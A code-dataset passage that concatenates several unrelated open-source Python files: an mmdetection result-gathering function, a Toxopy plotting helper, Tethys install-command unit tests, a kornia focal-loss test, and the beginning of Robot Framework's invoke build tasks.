dist.all_gather(shape_list, shape_tensor)
# padding result part tensor to max length
shape_max = torch.tensor(shape_list).max()
part_send = torch.zeros(shape_max, dtype=torch.uint8, device='cuda')
part_send[:shape_tensor[0]] = part_tensor
part_recv_list = [
part_tensor.new_zeros(shape_max) for _ in range(world_size)
]
# gather all result part
dist.all_gather(part_recv_list, part_send)
if rank == 0:
part_list = []
for recv, shape in zip(part_recv_list, shape_list):
part_list.append(
pickle.loads(recv[:shape[0]].cpu().numpy().tobytes()))
# sort the results
ordered_results = []
for res in zip(*part_list):
ordered_results.extend(list(res))
# the dataloader may pad some samples
ordered_results = ordered_results[:size]
return ordered_results
| 35.732984 | 79 | 0.603077 | [
"Apache-2.0"
] | lizhaoliu-Lec/Conformer | mmdetection/mmdet/apis/test.py | 6,825 | Python |
"""
Toxopy (https://github.com/bchaselab/Toxopy)
© M. Alyetama, University of Nebraska at Omaha
Licensed under the terms of the MIT license
"""
from toxopy import fwarnings, trials
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
def dlcboxplot(file,
variable,
ylab,
comparison,
jitter=False,
colors=False,
title=False,
save=False,
output_dir=None):
"""
file is typically 'dlc_all_avgs_updated.csv'
variable is either 'cat_ditance' or 'vel'
ylab is the y-axis label
colors is a list of two colors (e.g., ["#0062FF", "#DB62FF"])
output_dir to save the plot in a specific dir when save is True
"""
df = pd.read_csv(file)
tls = trials()
new = ['FT', 'ALONE1', 'SALINE1', 'ALONE2', 'URINE1',
'ALONE3', 'SALINE2', 'ALONE4', 'URINE2', 'ALONE5']
if variable == 'distance':
df = df[(df['trial'].isin(tls[0::2]))]
d = {}
for i, j in zip(new, tls):
d[j] = i
df = df.replace(d)
df = df[df['var'] == variable]
sns.set(style='ticks', font_scale=1)
plt.figure(figsize=(13, 5), dpi=100)
if comparison == 'infection_status':
test, control = 'Infected', 'Control'
comparing = 'infection_status'
legend = 'Infection Status'
elif comparison == 'indoor_outdoor_status':
test, control = 'Indoor-outdoor', 'Indoor'
comparing = 'indoor_outdoor_status'
legend = 'Indoor-outdoor Status'
if colors is False:
my_pal = {control: '#00FFFF', test: '#E60E3C'}
else:
my_pal = {control: colors[0], test: colors[1]}
ax = sns.boxplot(x='trial',
y='value',
data=df,
hue=comparing,
palette=my_pal)
if jitter is True:
sns.stripplot(x='trial',
y='value',
data=df,
color='black',
size=3,
jitter=1)
if variable != 'distance':
for i in range(len(df['trial'].unique())-1):
if variable == 'vel':
plt.vlines(i+.5, 10, 45, linestyles='solid',
colors='black', alpha=0.2)
elif variable == 'cat_distance':
plt.vlines(i+.5, 0, 1.3, linestyles='solid',
colors='black', alpha=0.2)
if title is not False:
plt.title(title, fontsize=12)
else:
pass
ax.set_xlabel('Trial', fontsize=12)
ax.set_ylabel(ylab, fontsize=12)
ax.legend(title=legend)
plt.legend(title=legend)
'''add significance bars and asterisks between boxes.
[first pair, second pair], ..., [|, –], ...'''
if variable == 'vel':
l = [[7.75, 5.75], [8.25, 6.25], [26, 28], [31, 33]]
elif variable == 'cat_distance':
l = [[7.75, 5.75], [8.25, 6.25], [0.85, 0.9], [0.95, 1]]
for x1, x2, y1, y2 in zip(l[0], l[1], l[2], l[3]):
sig = plt.plot([x1, x1, x2, x2], [y1, y2, y2, y1],
linewidth=1,
color='k')
plt.text((x1 + x2) * .5, y2 + 0, "*",
ha='center', va='bottom', fontsize=18)
plt.show()
fig = ax.get_figure()
if save is True:
def sav(myString):
return fig.savefig(myString,
bbox_inches='tight',
dpi=100,
pad_inches=0.1)
if output_dir is not None:
sav(f'{output_dir}/{variable}.png')
else:
sav(f'{variable}.png')
| 29.484127 | 65 | 0.499058 | [
"MIT"
] | bchaselab/Toxopy | toxopy/dlcboxplot.py | 3,718 | Python |
import os
from django.test import TestCase
from django.core.exceptions import ValidationError
from unittest import mock
from conda.cli.python_api import Commands
from tethys_apps.cli import install_commands
FNULL = open(os.devnull, 'w')
class TestServiceInstallHelpers(TestCase):
@mock.patch('builtins.open', side_effect=IOError('test'))
@mock.patch('tethys_apps.cli.install_commands.exit')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_open_file_error(self, mock_pretty_output, mock_exit, _):
mock_exit.side_effect = SystemExit
self.assertRaises(SystemExit, install_commands.open_file, 'foo')
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertEqual("test", po_call_args[0][0][0])
self.assertIn("An unexpected error occurred reading the file.", po_call_args[1][0][0])
mock_exit.assert_called_with(1)
def test_get_service_from_id_fail(self):
self.assertFalse(install_commands.get_service_from_id(9384))
def test_get_service_from_name_fail(self):
self.assertFalse(install_commands.get_service_from_name("sdfsdf"))
@mock.patch('tethys_services.models.PersistentStoreService.objects.get', return_value=True)
def test_get_service_from_id_persistent(self, mock_get):
self.assertEqual(install_commands.get_service_from_id(1).get('service_type'), 'persistent')
mock_get.assert_called_with(id=1)
@mock.patch('tethys_services.models.SpatialDatasetService.objects.get', return_value=True)
def test_get_service_from_id_spatial(self, mock_get):
self.assertEqual(install_commands.get_service_from_id(1).get('service_type'), 'spatial')
mock_get.assert_called_with(id=1)
@mock.patch('tethys_services.models.DatasetService.objects.get', return_value=True)
def test_get_service_from_id_dataset(self, mock_get):
self.assertEqual(install_commands.get_service_from_id(1).get('service_type'), 'dataset')
mock_get.assert_called_with(id=1)
@mock.patch('tethys_services.models.WebProcessingService.objects.get', return_value=True)
def test_get_service_from_id_wps(self, mock_get):
self.assertEqual(install_commands.get_service_from_id(1).get('service_type'), 'wps')
mock_get.assert_called_with(id=1)
@mock.patch('tethys_services.models.PersistentStoreService.objects.get', return_value=True)
def test_get_service_from_name_persistent(self, mock_get):
self.assertEqual(install_commands.get_service_from_name("nonexisting").get('service_type'), 'persistent')
mock_get.assert_called_with(name='nonexisting')
@mock.patch('tethys_services.models.SpatialDatasetService.objects.get', return_value=True)
def test_get_service_from_name_spatial(self, mock_get):
self.assertEqual(install_commands.get_service_from_name("nonexisting").get('service_type'), 'spatial')
mock_get.assert_called_with(name='nonexisting')
@mock.patch('tethys_services.models.DatasetService.objects.get', return_value=True)
def test_get_service_from_name_dataset(self, mock_get):
self.assertEqual(install_commands.get_service_from_name("nonexisting").get('service_type'), 'dataset')
mock_get.assert_called_with(name='nonexisting')
@mock.patch('tethys_services.models.WebProcessingService.objects.get', return_value=True)
def test_get_service_from_name_wps(self, mock_get):
self.assertEqual(install_commands.get_service_from_name("nonexisting").get('service_type'), 'wps')
mock_get.assert_called_with(name='nonexisting')
@mock.patch('tethys_apps.cli.install_commands.input')
def test_get_interactive_input(self, mock_input):
install_commands.get_interactive_input()
mock_input.assert_called_with("")
@mock.patch('tethys_apps.cli.install_commands.input')
def test_get_service_name_input(self, mock_input):
install_commands.get_service_name_input()
mock_input.assert_called_with("")
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_print_unconfigured_settings(self, mock_pretty_output):
class MockSetting:
def __init__(self, name, required):
self.name = name
self.required = required
app_name = 'foo'
mock_setting = [MockSetting('test_name', True)]
install_commands.print_unconfigured_settings(app_name, mock_setting)
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertEqual(f'\nThe following settings were not configured for app: {app_name}:\n', po_call_args[0][0][0])
self.assertIn('test_name', po_call_args[2][0][0])
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
@mock.patch('tethys_apps.cli.install_commands.call')
def test_run_sync_stores(self, mock_call, mock_pretty_output):
from tethys_apps.models import PersistentStoreConnectionSetting
app_name = 'foo'
install_commands.run_sync_stores(app_name, [PersistentStoreConnectionSetting()])
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertEqual(f'Running syncstores for app {app_name}', po_call_args[0][0][0])
mock_call.assert_called_with(['tethys', 'syncstores', app_name], )
@mock.patch('tethys_apps.cli.install_commands.get_service_from_name', return_value={'service_type': 'service_type',
'linkParam': 'linkParam'})
@mock.patch('tethys_apps.cli.install_commands.link_service_to_app_setting')
def test_find_and_link(self, mock_link_service_to_app_setting, _):
service_type = 'service_type'
setting_name = 'setting_name'
service_name = 'service_name'
app_name = 'app_name'
install_commands.find_and_link(service_type, setting_name, service_name, app_name)
mock_link_service_to_app_setting.assert_called_with('service_type',
service_name,
app_name,
'linkParam',
setting_name)
@mock.patch('tethys_apps.cli.install_commands.get_service_from_name', return_value=False)
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_find_and_link_warning(self, mock_pretty_output, _):
service_type = 'service_type'
setting_name = 'setting_name'
service_name = 'service_name'
app_name = 'app_name'
install_commands.find_and_link(service_type, setting_name, service_name, app_name)
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertEqual(f'Warning: Could not find service of type: {service_type} with the name/id: {service_name}',
po_call_args[0][0][0])
class TestInstallServicesCommands(TestCase):
@mock.patch('tethys_apps.cli.install_commands.find_and_link')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
@mock.patch('tethys_apps.models.CustomSetting')
def test_configure_services(self, mock_customsettings, mock_pretty_output, mock_find_and_link):
app_name = 'foo'
custom_service_name = 'custom_service_name'
custom_setting_name = 'custom_setting_name'
persistent_service_name = 'persistent_service_name'
persistent_setting_name = 'persistent_setting_name'
services = {'version': 1, 'custom_setting': {custom_setting_name: custom_service_name},
'persistent': {persistent_setting_name: persistent_service_name}}
mock_customsetting = mock.MagicMock(value=1)
mock_customsetting.save.side_effect = ValidationError('error')
mock_customsettings.objects.get.return_value = mock_customsetting
install_commands.configure_services(services, app_name)
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertIn(f'Incorrect value type given for custom setting \'{custom_setting_name}\'', po_call_args[0][0][0])
mock_find_and_link.assert_called_with('persistent', persistent_setting_name,
persistent_service_name, app_name)
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
@mock.patch('tethys_apps.cli.install_commands.os')
def test_run_portal_install_path_none(self, mock_os, _):
mock_os.path.exists.return_value = False
self.assertFalse(install_commands.run_portal_install(None, 'foo'))
@mock.patch('tethys_apps.cli.install_commands.configure_services')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
@mock.patch('tethys_apps.cli.install_commands.open_file')
@mock.patch('tethys_apps.cli.install_commands.os')
def test_run_portal_install(self, mock_os, mock_open_file, mock_pretty_output, mock_configure_services):
app_name = 'foo'
services = {'persistent': {'test_setting': 'test_service'}}
portal_options_services = {'apps': {app_name: {'services': services}}}
portal_options_empty_services = {'apps': {app_name: {'services': ''}}}
portal_options_no_services = {'apps': {app_name: ''}}
mock_open_file.side_effect = [portal_options_services, portal_options_empty_services,
portal_options_no_services]
mock_os.path.exists.return_value = True
self.assertTrue(install_commands.run_portal_install(None, app_name))
mock_configure_services.assert_called_with(services, app_name)
self.assertFalse(install_commands.run_portal_install(None, app_name))
self.assertFalse(install_commands.run_portal_install(None, app_name))
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertIn(f'No app configuration found for app: {app_name}', po_call_args[2][0][0])
self.assertIn('No apps configuration found in portal config file.', po_call_args[4][0][0])
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
@mock.patch('tethys_apps.cli.install_commands.os')
def test_run_services_path_none(self, mock_os, mock_pretty_output):
args = mock.MagicMock(services_file=None)
mock_os.path.exists.return_value = False
install_commands.run_services('foo', args)
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertEqual('No Services file found.', po_call_args[0][0][0])
@mock.patch('tethys_apps.cli.install_commands.configure_services')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
@mock.patch('tethys_apps.cli.install_commands.open_file')
@mock.patch('tethys_apps.cli.install_commands.os')
def test_run_services(self, mock_os, mock_open_file, mock_pretty_output, _):
args = mock.MagicMock(services_file='services_file')
mock_os.path.exists.return_value = True
mock_open_file.side_effect = ['service_file', '']
install_commands.run_services('foo', args)
install_commands.run_services('foo', args)
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertEqual('No Services listed in Services file.', po_call_args[0][0][0])
class TestInstallCommands(TestCase):
def setUp(self):
from tethys_apps.models import TethysApp
self.src_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
self.root_app_path = os.path.join(self.src_dir, 'apps', 'tethysapp-test_app')
self.app_model = TethysApp(
name='test_app',
package='test_app'
)
self.app_model.save()
pass
def tearDown(self):
self.app_model.delete()
pass
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
@mock.patch('builtins.input', side_effect=['x', 'n'])
@mock.patch('tethys_apps.cli.install_commands.exit')
@mock.patch('tethys_apps.cli.install_commands.call')
def test_install_file_not_generate(self, mock_call, mock_exit, _, __):
args = mock.MagicMock(file=None, quiet=False)
mock_exit.side_effect = SystemExit
self.assertRaises(SystemExit, install_commands.install_command, args)
self.assertEqual(3, len(mock_call.call_args_list))
mock_exit.assert_called_with(0)
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
@mock.patch('builtins.input', side_effect=['y'])
@mock.patch('tethys_apps.cli.install_commands.call')
@mock.patch('tethys_apps.cli.install_commands.exit')
def test_install_file_generate(self, mock_exit, mock_call, _, __):
args = mock.MagicMock(file=None, quiet=False)
check_call = ['tethys', 'gen', 'install']
mock_exit.side_effect = SystemExit
self.assertRaises(SystemExit, install_commands.install_command, args)
mock_call.assert_called_with(check_call)
mock_exit.assert_called_with(0)
@mock.patch('tethys_apps.cli.install_commands.run_services')
@mock.patch('tethys_apps.cli.install_commands.call')
@mock.patch('tethys_apps.cli.install_commands.exit')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_no_conda_input_file(self, mock_pretty_output, mock_exit, _, __):
file_path = os.path.join(self.root_app_path, 'install-no-dep.yml')
args = mock.MagicMock(file=file_path, verbose=False)
mock_exit.side_effect = SystemExit
self.assertRaises(SystemExit, install_commands.install_command, args)
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertIn("Running application install....", po_call_args[0][0][0])
self.assertIn("Quiet mode: No additional service setting validation will be performed.", po_call_args[1][0][0])
self.assertIn("Services Configuration Completed.", po_call_args[2][0][0])
self.assertIn("Skipping syncstores.", po_call_args[3][0][0])
mock_exit.assert_called_with(0)
@mock.patch('tethys_apps.cli.install_commands.run_services')
@mock.patch('tethys_apps.cli.install_commands.call')
@mock.patch('tethys_apps.cli.install_commands.exit')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_input_file_with_post(self, mock_pretty_output, mock_exit, _, __):
file_path = os.path.join(self.root_app_path, 'install-with-post.yml')
args = mock.MagicMock(file=file_path, verbose=False)
mock_exit.side_effect = SystemExit
self.assertRaises(SystemExit, install_commands.install_command, args)
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertIn("Running application install....", po_call_args[1][0][0])
self.assertIn("Quiet mode: No additional service setting validation will be performed.", po_call_args[2][0][0])
self.assertIn("Services Configuration Completed.", po_call_args[3][0][0])
self.assertIn("Skipping syncstores.", po_call_args[4][0][0])
self.assertIn("Running post installation tasks...", po_call_args[5][0][0])
self.assertIn("Post Script Result: b'test\\n'", po_call_args[6][0][0])
mock_exit.assert_called_with(0)
@mock.patch('tethys_apps.cli.install_commands.run_services')
@mock.patch('tethys_apps.cli.install_commands.run_sync_stores')
@mock.patch('tethys_apps.cli.install_commands.run_interactive_services')
@mock.patch('tethys_apps.cli.install_commands.call')
@mock.patch('tethys_apps.cli.install_commands.run_portal_install', return_value=False)
@mock.patch('tethys_apps.cli.install_commands.run_services')
@mock.patch('tethys_apps.cli.install_commands.exit')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_skip_input_file(self, mock_pretty_output, mock_exit, _, __, ___, ____, _____, ______):
file_path = os.path.join(self.root_app_path, 'install-skip-setup.yml')
mock_exit.side_effect = SystemExit
args = mock.MagicMock(file=file_path, verbose=False)
self.assertRaises(SystemExit, install_commands.install_command, args)
args = mock.MagicMock(file=file_path, develop=False)
self.assertRaises(SystemExit, install_commands.install_command, args)
args = mock.MagicMock(file=file_path, verbose=False, develop=False, force_services=False, quiet=False,
no_sync=False)
self.assertRaises(SystemExit, install_commands.install_command, args)
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertEqual("Skipping package installation, Skip option found.", po_call_args[0][0][0])
mock_exit.assert_called_with(0)
@mock.patch('tethys_apps.cli.install_commands.run_services')
@mock.patch('tethys_apps.cli.install_commands.call')
@mock.patch('tethys_apps.cli.install_commands.conda_run', return_value=['', '', 1])
@mock.patch('tethys_apps.cli.install_commands.exit')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_conda_and_pip_package_install(self, mock_pretty_output, mock_exit, mock_conda_run, mock_call, _):
file_path = os.path.join(self.root_app_path, 'install-dep.yml')
args = mock.MagicMock(file=file_path, develop=False, verbose=False, services_file=None)
mock_exit.side_effect = SystemExit
self.assertRaises(SystemExit, install_commands.install_command, args)
mock_conda_run.assert_called_with(Commands.INSTALL, '-c', 'tacaswell', 'geojson', use_exception_handler=False,
stdout=None, stderr=None)
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertEqual("Running conda installation tasks...", po_call_args[0][0][0])
self.assertIn("Warning: Packages installation ran into an error.", po_call_args[1][0][0])
self.assertEqual("Running pip installation tasks...", po_call_args[2][0][0])
self.assertEqual("Running application install....", po_call_args[3][0][0])
self.assertEqual("Quiet mode: No additional service setting validation will be performed.",
po_call_args[4][0][0])
self.assertEqual("Services Configuration Completed.", po_call_args[5][0][0])
self.assertEqual(['pip', 'install', 'see'], mock_call.mock_calls[0][1][0])
self.assertEqual(['python', 'setup.py', 'clean', '--all'], mock_call.mock_calls[1][1][0])
self.assertEqual(['python', 'setup.py', 'install'], mock_call.mock_calls[2][1][0])
self.assertEqual(['tethys', 'manage', 'sync'], mock_call.mock_calls[3][1][0])
mock_exit.assert_called_with(0)
@mock.patch('builtins.input', side_effect=['x', 5])
@mock.patch('tethys_apps.cli.install_commands.get_app_settings')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_interactive_custom_setting_set(self, mock_pretty_output, mock_get_settings, _):
mock_cs = mock.MagicMock()
mock_cs.name = 'mock_cs'
mock_cs.save.side_effect = [ValidationError('error'), mock.DEFAULT]
mock_get_settings.return_value = {'unlinked_settings': [mock_cs]}
install_commands.run_interactive_services('foo')
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertIn("Configuring mock_cs", po_call_args[2][0][0])
self.assertIn("Type", po_call_args[3][0][0])
self.assertIn("Enter the desired value", po_call_args[4][0][0])
self.assertIn("Incorrect value type", po_call_args[5][0][0])
self.assertIn("Enter the desired value", po_call_args[6][0][0])
self.assertEqual(mock_cs.name + " successfully set with value: 5.", po_call_args[7][0][0])
@mock.patch('builtins.input', side_effect=[''])
@mock.patch('tethys_apps.cli.install_commands.get_app_settings')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_interactive_custom_setting_skip(self, mock_pretty_output, mock_get_settings, _):
mock_cs = mock.MagicMock()
mock_cs.name = 'mock_cs'
mock_get_settings.return_value = {'unlinked_settings': [mock_cs]}
install_commands.run_interactive_services('foo')
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertIn("Configuring mock_cs", po_call_args[2][0][0])
self.assertIn("Type", po_call_args[3][0][0])
self.assertIn("Enter the desired value", po_call_args[4][0][0])
self.assertEqual(f"Skipping setup of {mock_cs.name}", po_call_args[5][0][0])
@mock.patch('builtins.input', side_effect=KeyboardInterrupt)
@mock.patch('tethys_apps.cli.install_commands.exit')
@mock.patch('tethys_apps.cli.install_commands.get_app_settings')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_interactive_custom_setting_interrupt(self, mock_pretty_output, mock_get_settings, mock_exit, _):
mock_cs = mock.MagicMock()
mock_cs.name = 'mock_cs'
mock_get_settings.return_value = {'unlinked_settings': [mock_cs]}
mock_exit.side_effect = SystemExit
self.assertRaises(SystemExit, install_commands.run_interactive_services, 'foo')
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertIn("Configuring mock_cs", po_call_args[2][0][0])
self.assertIn("Type", po_call_args[3][0][0])
self.assertIn("Enter the desired value", po_call_args[4][0][0])
self.assertEqual("\nInstall Command cancelled.", po_call_args[5][0][0])
mock_exit.assert_called_with(0)
@mock.patch('builtins.input', side_effect=['1', '1', '', KeyboardInterrupt])
@mock.patch('tethys_apps.cli.install_commands.get_setting_type', return_value='persistent')
@mock.patch('tethys_apps.cli.install_commands.get_service_from_id', side_effect=ValueError)
@mock.patch('tethys_apps.cli.install_commands.get_service_from_name', side_effect=[False, {'service_type': 'st',
'linkParam': 'lp'}])
@mock.patch('tethys_apps.cli.install_commands.exit')
@mock.patch('tethys_apps.cli.install_commands.services_list_command')
@mock.patch('tethys_apps.cli.install_commands.get_app_settings')
@mock.patch('tethys_apps.cli.install_commands.link_service_to_app_setting')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_interactive_service_setting_all(self, mock_pretty_output, mock_lstas, mock_get_settings, mock_slc,
mock_exit, ____, ___, __, _):
mock_ss = mock.MagicMock()
del mock_ss.value
mock_ss.name = 'mock_ss'
mock_ss.save.side_effect = [ValidationError('error'), mock.DEFAULT]
mock_get_settings.return_value = {'unlinked_settings': [mock_ss, mock_ss, mock_ss, mock_ss]}
mock_s = mock.MagicMock()
mock_slc.side_effect = [[[]], [[mock_s]], [[mock_s]], [[mock_s]]]
mock_exit.side_effect = SystemExit
self.assertRaises(SystemExit, install_commands.run_interactive_services, 'foo')
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertIn("Configuring mock_ss", po_call_args[2][0][0])
self.assertIn("Type", po_call_args[3][0][0])
self.assertIn("No compatible services found.", po_call_args[4][0][0])
self.assertIn("Enter the service ID/Name", po_call_args[7][0][0])
self.assertIn("Incorrect service ID/Name.", po_call_args[8][0][0])
self.assertIn("Enter the service ID/Name", po_call_args[9][0][0])
self.assertIn(f"Skipping setup of {mock_ss.name}", po_call_args[13][0][0])
self.assertEqual("\nInstall Command cancelled.", po_call_args[17][0][0])
mock_lstas.assert_called_with('st', '1', 'foo', 'lp', 'mock_ss')
mock_exit.assert_called_with(0)
def test_get_setting_type(self):
from tethys_apps.models import PersistentStoreDatabaseSetting
self.assertEqual('persistent', install_commands.get_setting_type(PersistentStoreDatabaseSetting()))
| 52.559395 | 120 | 0.707253 | [
"BSD-2-Clause"
] | Aquaveo/tethys | tests/unit_tests/test_tethys_apps/test_cli/test_install_commands.py | 24,335 | Python |
import logging
import pytest
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import kornia as kornia
logger = logging.getLogger(__name__)
class TestIntegrationFocalLoss:
# optimization
thresh = 1e-1
lr = 1e-3
num_iterations = 1000
num_classes = 2
# focal loss
alpha = 2.0
gamma = 2.0
def generate_sample(self, base_target, std_val=0.1):
target = base_target.float() / base_target.max()
noise = std_val * torch.rand(1, 1, 6, 5)
return target + noise
@staticmethod
def init_weights(m):
if isinstance(m, nn.Conv2d):
torch.nn.init.xavier_uniform_(m.weight)
def test_conv2d_relu(self):
# we generate base sample
target = torch.LongTensor(1, 6, 5).fill_(0)
for i in range(1, self.num_classes):
target[..., i:-i, i:-i] = i
m = nn.Sequential(
nn.Conv2d(1, self.num_classes, kernel_size=3, padding=1),
nn.ReLU(True),
)
m.apply(self.init_weights)
optimizer = optim.Adam(m.parameters(), lr=self.lr)
criterion = kornia.losses.FocalLoss(
alpha=self.alpha, gamma=self.gamma, reduction='mean')
# NOTE: uncomment to compare against vanilla cross entropy
# criterion = nn.CrossEntropyLoss()
for iter_id in range(self.num_iterations):
sample = self.generate_sample(target)
output = m(sample)
loss = criterion(output, target)
logger.debug("Loss: {}".format(loss.item()))
optimizer.zero_grad()
loss.backward()
optimizer.step()
sample = self.generate_sample(target)
output_argmax = torch.argmax(m(sample), dim=1)
logger.debug("Output argmax: \n{}".format(output_argmax))
# TODO(edgar): replace by IoU or find a more stable solution
# for this test. The issue is that depending on
# the seed to initialize the weights affects the
# final results and slows down the convergence of
# the algorithm.
val = F.mse_loss(output_argmax.float(), target.float())
if not val.item() < self.thresh:
pytest.xfail("Wrong seed or initial weight values.")
| 30.736842 | 70 | 0.602312 | [
"Apache-2.0"
] | BloodAxe/kornia | test/integration/test_focal.py | 2,336 | Python |
"""Tasks to help Robot Framework packaging and other development.
Executed by Invoke <http://pyinvoke.org>. Install it with `pip install invoke`
and run `invoke --help` and `invoke --list` for details how to execute tasks.
See BUILD.rst for packaging and releasing instructions.
"""
from pathlib import Path
from urllib.request import urlretrieve
import os
import shutil
import sys
import tarfile
import tempfile
import zipfile
assert Path.cwd().resolve() == Path(__file__).resolve().parent
sys.path.insert(0, 'src')
from invoke import Exit, task
from rellu import initialize_labels, ReleaseNotesGenerator, Version
from rellu.tasks import clean
from robot.libdoc import libdoc
REPOSITORY = 'robotframework/robotframework'
VERSION_PATH = Path('src/robot/version.py')
VERSION_PATTERN = "VERSION = '(.*)'"
POM_PATH = Path('pom.xml')
POM_VERSION_PATTERN = '<version>(.*)</version>'
RELEASE_NOTES_PATH = Path('doc/releasenotes/rf-{version}.rst')
RELEASE_NOTES_TITLE = 'Robot Framework {version}'
RELEASE_NOTES_INTRO = '''
`Robot Framework`_ {version} is a new release with **UPDATE** enhancements
and bug fixes. **MORE intro stuff...**
**REMOVE reference to tracker if release notes contain all issues.**
All issues targeted for Robot Framework {version.milestone} can be found
from the `issue tracker milestone`_.
Questions and comments related to the release can be sent to the
`robotframework-users`_ mailing list or to `Robot Framework Slack`_,
and possible bugs submitted to the `issue tracker`_.
**REMOVE ``--pre`` from the next command with final releases.**
If you have pip_ installed, just run
::
pip install --pre --upgrade robotframework
to install the latest available release or use
::
pip install robotframework=={version}
to install exactly this version. Alternatively you can download the source
distribution from PyPI_ and install it manually. For more details and other
installation approaches, see the `installation instructions`_.
Robot Framework {version} was released on {date}.
.. _Robot Framework: http://robotframework.org
.. _pip: http://pip-installer.org
.. _PyPI: https://pypi.python.org/pypi/robotframework
.. _issue tracker milestone: https://github.com/robotframework/robotframework/issues?q=milestone%3A{version.milestone}
.. _issue tracker: https://github.com/robotframework/robotframework/issues
.. _robotframework-users: http://groups.google.com/group/robotframework-users
.. _Robot Framework Slack: https://robotframework-slack-invite.herokuapp.com
.. _installation instructions: ../../INSTALL.rst
'''
@task
def set_version(ctx, version):
"""Set project version in `src/robot/version.py`` file.
Args:
version: Project version to set or ``dev`` to set development version.
Following PEP-440 compatible version numbers are supported:
- Final version like 3.0 or 3.1.2.
- Alpha, beta or release candidate with ``a``, ``b`` or ``rc`` postfix,
respectively, and an incremented number like 3.0a1 or 3.0.1rc1.
- Development version with ``.dev`` postix and an incremented number like
3.0.dev1 or 3.1a1.dev2.
When the given version is ``dev``, the existing version number is updated
to the next suitable development version. For example, 3.0 -> 3.0.1.dev1,
3.1.1 -> 3.1.2.dev1, 3.2a1 -> 3.2a2.dev1, 3.2.dev1 -> 3.2.dev2.
"""
version = Version(version, VERSION_PATH, VERSION_PATTERN)
version.write()
pom = Version(str(version), POM_PATH, POM_VERSION_PATTERN)
pom.write()
print(version)
@task
def print_version(ctx):
"""Print the current project version."""
print(Version(path=VERSION_PATH, pattern=VERSION_PATTERN))
@task
def library_docs(ctx, name):
"""Generate standard library documentation.
Args:
name: Name of the library or ``all`` to generate docs for all libs.
Name is case-insensitive and can be shortened as long as it
is a unique prefix. For example, ``b`` is equivalent to
``BuiltIn`` and ``di`` equivalent to ``Dialogs``.
"""
libraries = ['BuiltIn', 'Collections', 'DateTime', 'Dialogs',
'OperatingSystem', 'Process', 'Screenshot', 'String',
'Telnet', 'XML']
name = name.lower()
if name != 'all':
libraries = [lib for lib in libraries if lib.lower().startswith(name)]
if len(libraries) != 1:
raise Exit(f"'{name}' is not a unique library prefix.")
for lib in libraries:
libdoc(lib, str(Path(f'doc/libraries/{lib}.html')))
@task
def release_notes(ctx, version=None, username=None, password=None, write=False):
"""Generate release notes based on issues in the issue tracker.
Args:
version: Generate release notes for this version. If not given,
generated them for the current version.
username: GitHub username.
password: GitHub password.
write: When set to True, write release notes to a file overwriting
possible existing file. Otherwise just print them to the
terminal.
Username and password can also be specified using ``GITHUB_USERNAME`` and
``GITHUB_PASSWORD`` environment variable, respectively. If they aren't
specified at all, communication with GitHub is anonymous and typically
pretty slow.
"""
version = Version(version, VERSION_PATH, VERSION_PATTERN)
file = RELEASE_NOTES_PATH if write else sys.stdout
generator = ReleaseNotesGenerator(REPOSITORY, RELEASE_NOTES_TITLE,
RELEASE_NOTES_INTRO)
generator.generate(version, username, password, file)
@task
def init_labels(ctx, username=None, password=None):
"""Initialize project by setting labels in the issue tracker.
Args:
username: GitHub username.
password: GitHub password.
Username and password can also be specified using ``GITHUB_USERNAME`` and
``GITHUB_PASSWORD`` environment variable, respectively.
Should only be executed once when taking ``rellu`` tooling to use or
when labels it uses have changed.
"""
initialize_labels(REPOSITORY, username, password)
@task
def jar(ctx, jython_version='2.7.0', pyyaml_version='3.11', remove_dist=False):
"""Create JAR distribution.
Downloads Jython JAR and PyYAML if needed.
Args:
jython_version: Jython version to use as a base. Must match version in
`jython-standalone-<version>.jar` found from Maven central.
pyyaml_version: Version of PyYAML that will be included in the
standalone jar. The version must be available from PyPI.
remove_dist: Control is 'dist' directory initially removed or not.
"""
clean(ctx, remove_dist, create_dirs=True)
jython_jar = get_jython_jar(jython_version)
print(f"Using '{jython_jar}'.")
compile_java_files(ctx, jython_jar)
unzip_jar(jython_jar)
copy_robot_files()
pyaml_archive = get_pyyaml(pyyaml_version)
extract_and_copy_pyyaml_files(pyyaml_version, pyaml_archive)
compile_python_files(ctx, jython_jar)
version = Version(path=VERSION_PATH, pattern=VERSION_PATTERN)
create_robot_jar(ctx, str(version))
def get_jython_jar(version):
